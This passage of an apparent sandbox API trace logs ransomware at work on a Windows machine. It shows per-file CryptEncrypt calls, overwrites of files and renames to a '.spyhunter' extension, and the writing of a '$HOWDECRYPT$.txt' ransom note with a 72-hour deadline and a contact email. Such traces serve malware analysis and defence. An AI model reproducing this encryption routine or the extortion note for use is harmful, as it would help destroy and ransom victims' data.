(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.405] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fc10, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fc10*=0x2ac, lpOverlapped=0x0) returned 1 [0092.405] CloseHandle (hObject=0x178) returned 1 [0092.406] GetProcessHeap () returned 0x2c0000 [0092.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346c68 | out: hHeap=0x2c0000) returned 1 [0092.406] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbb0 | out: pbBuffer=0x270fbb0) returned 1 [0092.406] GetProcessHeap () returned 0x2c0000 [0092.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.406] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fba8*=0x30) returned 1 [0092.406] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.407] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb") returned 68 [0092.407] StrStrW (lpFirst="vstoee90.tlb", lpSrch=".txt") returned 0x0 [0092.407] GetProcessHeap () returned 0x2c0000 [0092.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c11050 [0092.407] ReadFile (in: hFile=0x178, lpBuffer=0x2c11050, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c11050*, lpNumberOfBytesRead=0x270fb6c*=0x2800, lpOverlapped=0x0) returned 1 [0092.410] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.410] WriteFile (in: hFile=0x178, lpBuffer=0x2c11050*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c11050*, lpNumberOfBytesWritten=0x270fb6c*=0x2800, lpOverlapped=0x0) returned 1 [0092.410] GetProcessHeap () returned 0x2c0000 [0092.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c11050 | out: hHeap=0x2c0000) returned 1 [0092.410] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.410] WriteFile (in: hFile=0x178, lpBuffer=0x270fbac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fb6c, lpOverlapped=0x0 | out: lpBuffer=0x270fbac*, lpNumberOfBytesWritten=0x270fb6c*=0x4, lpOverlapped=0x0) returned 1 [0092.411] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fb6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270fb6c*=0x30, lpOverlapped=0x0) returned 1 [0092.411] CloseHandle (hObject=0x178) returned 1 [0092.412] GetProcessHeap () returned 0x2c0000 [0092.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0092.412] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb.spyhunter") returned 78 [0092.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.spyhunter")) returned 1 [0092.413] GetProcessHeap () returned 0x2c0000 [0092.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0092.413] GetProcessHeap () returned 0x2c0000 [0092.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.413] GetProcessHeap () returned 0x2c0000 [0092.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0092.413] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fba8 | out: pbBuffer=0x270fba8) returned 1 [0092.413] GetProcessHeap () returned 0x2c0000 [0092.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.413] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fba0*=0x30) returned 1 [0092.413] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb") returned 69 [0092.414] StrStrW (lpFirst="vstoee100.tlb", lpSrch=".txt") returned 0x0 [0092.414] GetProcessHeap () returned 0x2c0000 [0092.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c11050 [0092.414] ReadFile (in: hFile=0x178, lpBuffer=0x2c11050, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fb64, lpOverlapped=0x0 | out: lpBuffer=0x2c11050*, lpNumberOfBytesRead=0x270fb64*=0x2800, lpOverlapped=0x0) returned 1 [0092.453] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.453] WriteFile (in: hFile=0x178, lpBuffer=0x2c11050*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fb64, lpOverlapped=0x0 | out: lpBuffer=0x2c11050*, lpNumberOfBytesWritten=0x270fb64*=0x2800, lpOverlapped=0x0) returned 1 [0092.453] GetProcessHeap () returned 0x2c0000 [0092.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c11050 | out: hHeap=0x2c0000) returned 1 [0092.454] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.454] WriteFile (in: hFile=0x178, lpBuffer=0x270fba4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fb64, lpOverlapped=0x0 | out: lpBuffer=0x270fba4*, lpNumberOfBytesWritten=0x270fb64*=0x4, lpOverlapped=0x0) returned 1 [0092.454] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fb64, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270fb64*=0x30, lpOverlapped=0x0) returned 1 [0092.454] CloseHandle (hObject=0x178) returned 1 [0092.455] GetProcessHeap () returned 0x2c0000 [0092.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.456] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb.spyhunter") returned 79 [0092.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.spyhunter")) returned 1 [0092.464] GetProcessHeap () returned 0x2c0000 [0092.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c11050 | out: hHeap=0x2c0000) returned 1 [0092.464] GetProcessHeap () returned 0x2c0000 [0092.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.465] GetProcessHeap () returned 0x2c0000 [0092.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e128 | out: hHeap=0x2c0000) returned 1 [0092.465] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fba8 | out: pbBuffer=0x270fba8) returned 1 [0092.465] GetProcessHeap () returned 0x2c0000 [0092.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.465] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fba0*=0x30) returned 1 [0092.465] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.466] GetProcessHeap () returned 0x2c0000 [0092.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.466] GetProcessHeap () returned 0x2c0000 [0092.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329dd8 | out: hHeap=0x2c0000) returned 1 [0092.466] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fba0 | out: pbBuffer=0x270fba0) returned 1 [0092.466] GetProcessHeap () returned 0x2c0000 [0092.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.466] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb98*=0x30) returned 1 [0092.466] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\cloud_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.466] GetProcessHeap () returned 0x2c0000 [0092.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.466] GetProcessHeap () returned 0x2c0000 [0092.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358610 | out: hHeap=0x2c0000) returned 1 [0092.466] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fba0 | out: pbBuffer=0x270fba0) returned 1 [0092.466] GetProcessHeap () returned 0x2c0000 [0092.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.467] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb98*=0x30) returned 1 [0092.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.467] GetProcessHeap () returned 0x2c0000 [0092.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.467] GetProcessHeap () returned 0x2c0000 [0092.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e488 | out: hHeap=0x2c0000) returned 1 [0092.467] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb98 | out: pbBuffer=0x270fb98) returned 1 [0092.468] GetProcessHeap () returned 0x2c0000 [0092.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.468] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb90*=0x30) returned 1 [0092.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.468] GetProcessHeap () returned 0x2c0000 [0092.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.468] GetProcessHeap () returned 0x2c0000 [0092.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x349850 | out: hHeap=0x2c0000) returned 1 [0092.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb98 | out: pbBuffer=0x270fb98) returned 1 [0092.468] GetProcessHeap () returned 0x2c0000 [0092.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.468] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb90*=0x30) returned 1 [0092.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.469] GetProcessHeap () returned 0x2c0000 [0092.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.469] GetProcessHeap () returned 0x2c0000 [0092.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378818 | out: hHeap=0x2c0000) returned 1 [0092.469] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb90 | out: pbBuffer=0x270fb90) returned 1 [0092.469] GetProcessHeap () returned 0x2c0000 [0092.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.469] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb88*=0x30) returned 1 [0092.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.469] GetProcessHeap () returned 0x2c0000 [0092.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.469] GetProcessHeap () returned 0x2c0000 [0092.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346e28 | out: hHeap=0x2c0000) returned 1 [0092.470] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb90 | out: pbBuffer=0x270fb90) returned 1 [0092.470] GetProcessHeap () returned 0x2c0000 [0092.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.470] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb88*=0x30) returned 1 [0092.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.470] GetProcessHeap () returned 0x2c0000 [0092.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.470] GetProcessHeap () returned 0x2c0000 [0092.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346568 | out: hHeap=0x2c0000) returned 1 [0092.470] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb88 | out: pbBuffer=0x270fb88) returned 1 [0092.470] GetProcessHeap () returned 0x2c0000 [0092.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.470] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb80*=0x30) returned 1 [0092.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.470] GetProcessHeap () returned 0x2c0000 [0092.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.470] GetProcessHeap () returned 0x2c0000 [0092.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346808 | out: hHeap=0x2c0000) returned 1 [0092.471] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb88 | out: pbBuffer=0x270fb88) returned 1 [0092.471] GetProcessHeap () returned 0x2c0000 [0092.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.471] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb80*=0x30) returned 1 [0092.471] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.471] GetProcessHeap () returned 0x2c0000 [0092.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.471] GetProcessHeap () returned 0x2c0000 [0092.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f9b8 | out: hHeap=0x2c0000) returned 1 [0092.471] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb80 | out: pbBuffer=0x270fb80) returned 1 [0092.471] GetProcessHeap () returned 0x2c0000 [0092.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.471] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb78*=0x30) returned 1 [0092.471] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.471] GetProcessHeap () returned 0x2c0000 [0092.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.471] GetProcessHeap () returned 0x2c0000 [0092.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e710 | out: hHeap=0x2c0000) returned 1 [0092.472] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb80 | out: pbBuffer=0x270fb80) returned 1 [0092.472] GetProcessHeap () returned 0x2c0000 [0092.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.472] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb78*=0x30) returned 1 [0092.472] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.472] GetProcessHeap () returned 0x2c0000 [0092.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.472] GetProcessHeap () returned 0x2c0000 [0092.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0092.472] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.473] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.473] WriteFile (in: hFile=0x178, lpBuffer=0x270faaf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fbd8, lpOverlapped=0x0 | out: lpBuffer=0x270faaf*, lpNumberOfBytesWritten=0x270fbd8*=0x127, lpOverlapped=0x0) returned 1 [0092.474] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.474] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fbd8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fbd8*=0x2ac, lpOverlapped=0x0) returned 1 [0092.475] CloseHandle (hObject=0x178) returned 1 [0092.475] GetProcessHeap () returned 0x2c0000 [0092.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0092.475] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb78 | out: pbBuffer=0x270fb78) returned 1 [0092.475] GetProcessHeap () returned 0x2c0000 [0092.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.475] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb70*=0x30) returned 1 [0092.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 